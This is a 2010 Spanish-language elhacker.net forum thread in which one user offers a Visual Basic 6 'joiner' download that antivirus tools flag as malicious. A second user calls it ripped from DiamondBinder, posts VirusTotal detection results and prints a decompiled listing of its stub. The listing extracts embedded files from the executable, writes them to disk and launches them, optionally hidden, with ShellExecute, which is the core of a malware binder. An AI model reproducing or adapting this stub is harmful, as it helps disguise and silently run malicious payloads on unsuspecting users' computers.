Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: RedBull_ en 4 Octubre 2010, 21:34 pm


Título: My Fucking Joiner ! by RedBull_
Publicado por: RedBull_ en 4 Octubre 2010, 21:34 pm
Hola soy nuevo en el foro , les presento uno de mis proyectos hecho en vb 6.0 ! , soy Aficionado , ya entendi todo acerca del vb , pero aún me falta , solo unas cuantas cosas , el Proyecto me Guie de algunos Manuales , que hisieron , Pero le agrege algunas cosas ... :laugh: , bueno veanlo a ver que tal , no puedo tomar foto porque mi teclado no tiene el Boton Impr Paint Petsis  :xD , Gracias!

Descarga - MultiUpload.com

http://www.multiupload.com/ZX2Y1SU10S
 tal ves su AV los detecte como Maliciosos , no les culpo , mi AV avast 5 Lo detecto y prove con el nod32 , tambien ...  :-\ - Adios a todos espero Comentarios

PD.- Yo soy Unknown si no que mas me gusta el nick RedBull_  :P

Título: Re: My Fucking Joiner ! by RedBull_
Publicado por: BlackZeroX en 6 Octubre 2010, 06:50 am
.
Antes que nada SHARKI SE VA A ENOJAR bueno SHARKO, aunque se sabe que el hace lo mismo.
.
.
.
Cita de: RedBull_ en  4 Octubre 2010, 21:34 pm
Hola soy nuevo en el foro , les presento uno de mis proyectos hecho en vb 6.0 ! , soy Aficionado , ya entendi todo acerca del vb , pero aún me falta , solo unas cuantas cosas , el Proyecto me Guie de algunos Manuales , que hisieron , Pero le agrege algunas cosas ... :laugh: , bueno veanlo a ver que tal , no puedo tomar foto porque mi teclado no tiene el Boton Impr Paint Petsis  :xD , Gracias!

Descarga - MultiUpload.com

http://www.multiupload.com/ZX2Y1SU10S
 tal ves su AV los detecte como Maliciosos , no les culpo , mi AV avast 5 Lo detecto y prove con el nod32 , tambien ...  :-\ - Adios a todos espero Comentarios

PD.- Yo soy Unknown si no que mas me gusta el nick RedBull_  :P
.
.
y bueno... donde esta el codigo fuente... ESTE ES UN FORO DE PROGRAMACIÓN NO DE SOFTWARE

Lo subi a --->  VirusTotal   <---

http://www.virustotal.com/file-scan/report.html?id=322942f84e8218fb69448b30ccffb1f71478baa6c0307051232db067c55ac7d2-1286340610

Este es el Stup

http://www.virustotal.com/file-scan/report.html?id=f3fd6bc9707921484eb8e7435c3d6e5e22b836a55e0ca0ccd1222a952b1966dc-1261616887

[Dice claramente que fue analizado en el 2009]

Código:

File name:
Stub.dll
Submission date:
2009-12-24 02:08:07 (UTC)
Current status:
finished
Result:
36 /41 (87.8%)


Por cierto que buen RIPEo de codigo eee... DiamondBinder, SE NOTO EL ESFUERZO

Tratando de Decompilarlo un poco... no me dio el codigo en vb6 pero es entendible.

Código
  1.  
  2.   'Data Table: 4011AC
  3.   loc_401866: arg_8(0) = CStr(FreeFile)
  4.   loc_4018B6: arg_8(20) = App.Path & "\" & App.EXEName & ".exe"
  5.   loc_4018DC: Open arg_8(20) For Binary As CInt(arg_8(0)) Len = &HFF
  6.   loc_4018F3: arg_8(4) = CStr(Space(LOF(1)))
  7.   loc_40190D: Get CInt(arg_8(0)), 0, arg_8(4)
  8.   loc_401916: Close CInt(arg_8(0))
  9.               If (Len(arg_8(4)) = 0) Then '401929
  10.   loc_401927:   End
  11.               End If
  12.   loc_40194E: arg_2008 = Split(arg_8(4), "//DiamondBinder//", -1, 0)
  13.   loc_40195A: arg_8(8) = arg_2008
  14.               If (UBound(arg_8(8), 1) > 0) Then '401BD9
  15.                 For var_D4 = 1 To CInt(UBound(arg_8(8), 1)): arg_8(28) = var_D4 'Integer
  16.   loc_4019B8:     arg_2008 = Split(arg_8(8)(CLng(arg_8(28))), "//DiamonBinderData//", -1, 0)
  17.   loc_4019C4:     arg_8(12) = arg_2008
  18.                   If (UBound(arg_8(12), 1) > 0) Then '401BCF
  19.   loc_4019EA:       arg_8(36) = arg_8(12)(1)
  20.   loc_4019FA:       arg_8(40) = arg_8(12)(2)
  21.   loc_401A0A:       arg_8(44) = arg_8(12)(3)
  22.   loc_401A1A:       arg_8(48) = arg_8(12)(4)
  23.   loc_401A2A:       arg_8(52) = arg_8(12)(5)
  24.   loc_401A3A:       arg_8(32) = arg_8(12)(6)
  25.                     If (arg_8(44) = "Si") Then '401A6B
  26.   loc_401A5F:         arg_8(36) = Unknown_401814("DiamondBinder", arg_8(36))
  27.   loc_401A68:         GoTo loc_401A75
  28.                     End If
  29.   loc_401A70:       arg_8(36) = arg_8(36)
  30.   loc_401A75:       ' Referenced from: 401A68
  31.                     If (arg_8(48) <> vbNullString) Then '401AB2
  32.   loc_401AA9:         arg_8(16) = Environ$(CVar(Replace(arg_8(48), ", vbNullString, 1, -1, 0)))
  33.                     End If
  34.   loc_401AD9:       arg_8(24) = arg_8(16) & "\" & CStr(arg_8(28)) & "." & arg_8(52)
  35.   loc_401AF8:       Open arg_8(24) For Binary As CInt(arg_8(0)) Len = &HFF
  36.   loc_401B0D:       Put CInt(arg_8(0)), 0, arg_8(36)
  37.   loc_401B16:       Close CInt(arg_8(0))
  38.   loc_401B1D:       var_D8 = arg_8(32)
  39.                     If (var_D8 = "Normal") Then '401B3B
  40.   loc_401B32:         arg_8(32) = CStr(1)
  41.   loc_401B38:         GoTo loc_401B89
  42.                     End If
  43.                     If (var_D8 = "Oculta") Then '401B56
  44.   loc_401B4D:         arg_8(32) = CStr(0)
  45.   loc_401B53:         GoTo loc_401B89
  46.                     End If
  47.                     If (var_D8 = "Minimizada") Then '401B71
  48.   loc_401B68:         arg_8(32) = CStr(1)
  49.   loc_401B6E:         GoTo loc_401B89
  50.                     End If
  51.                     If (var_D8 = "Maximizada") Then '401B89
  52.   loc_401B83:         arg_8(32) = CStr(2)
  53.   loc_401B89:         ' Referenced from: 401B38
  54.   loc_401B89:         ' Referenced from: 401B53
  55.   loc_401B89:         ' Referenced from: 401B6E
  56.                     End If
  57.                     If (arg_8(40) = "Si") Then '401BCF
  58.   loc_401BBC:         ShellExecute(0, 0, arg_8(24), 0, 0, CLng(arg_8(32)))
  59.                     End If
  60.                   End If
  61.                 Next var_D4 'Integer
  62.               End If
  63.   loc_401BD9: Exit Sub
  64.  
  65.  

PAra evitar Ediciones del post y liogas posteriores de los ejecutables Originales he publicado los mismos en otro servidor:

http://infrangelux.sytes.net/FileX/index.php?dir=/BlackZeroX/Codigos%20Ripeados/DiamonBinder/My%20Fucking%20Joiner%20!%20by%20RedBull/Ejecutables

Dulces Lunas!¡,


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines